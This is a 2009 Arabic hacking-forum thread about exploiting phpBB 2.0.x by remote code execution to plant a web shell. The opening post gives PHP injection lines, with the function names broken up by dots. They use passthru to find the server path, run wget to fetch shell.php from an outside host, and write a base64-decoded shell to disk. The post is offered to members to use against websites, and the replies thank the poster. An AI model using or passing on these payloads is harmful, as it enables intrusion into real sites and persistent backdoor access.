التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

موضوع مغلق
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-30-2009, 03:09 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية SkRtaR
 

 

 
إحصائية العضو





SkRtaR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
SkRtaR is on a distinguished road

افتراضي [فيديو] استغلال قاعدة بيانات phpbb ورفع شل


اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ

سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه


التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar


هدية خاصة للعناكب..


بدائل عن ماحقن بالتطبيق :

كود PHP:
passthr.u('pwd'// كأول مرة, للتعرف ع المسار
passthr.u('wget site.com/shell.php -O /path/shell.php')  // لسحب الشل ع هالمسار 
طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
كود PHP:
file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here')); 
والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها


اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث


ThE End

Bay Bay ... $ee y0u


Ftd]d,D hsjyghg rhu]m fdhkhj phpbb ,vtu ag

التوقيع

[img]http://www.m5zzn.com/upload/uploads/m5zzn
-ba6dee59b2.jpg[/img]




SkRtaR


SpiDerS

fiRseT

SpiDer 4 eVeR

 

   

قديم 04-30-2009, 07:13 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية Sniper_Mo
 

 

 
إحصائية العضو







Sniper_Mo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sniper_Mo is on a distinguished road

افتراضي


الف شكرا اخي SkRtaR على الشرح جاري التحميل والتجربة

التوقيع

سيستمر غيابي عن الشبكة والانترنت لعدة اسابيع اخرى. ارجو ان تدعولي لانني امر بازمات :088: عدة. وشكرا لكم

 

   

قديم 05-29-2009, 06:28 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية harcha
 

 

 
إحصائية العضو





harcha غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
harcha is on a distinguished road

افتراضي


شكرا

   

قديم 05-29-2009, 06:31 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية harcha
 

 

 
إحصائية العضو





harcha غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
harcha is on a distinguished road

افتراضي


الرابط لا يعمل

   

موضوع مغلق

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
قاعدة بيانات مع اليوزر والباس )3( Tr0j4n Hackers Showoff 41 07-23-2014 03:38 AM
[شرح] : اخذ قاعدة بيانات المنتدى ب 3 خطوات xman2 قســم تطويــر المــــواقع 1 08-23-2009 12:39 AM
ترقية قاعدة بيانات ونسخها !!!! xman2 قســم تطويــر المــــواقع 0 07-22-2009 10:00 AM


الساعة الآن 03:03 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0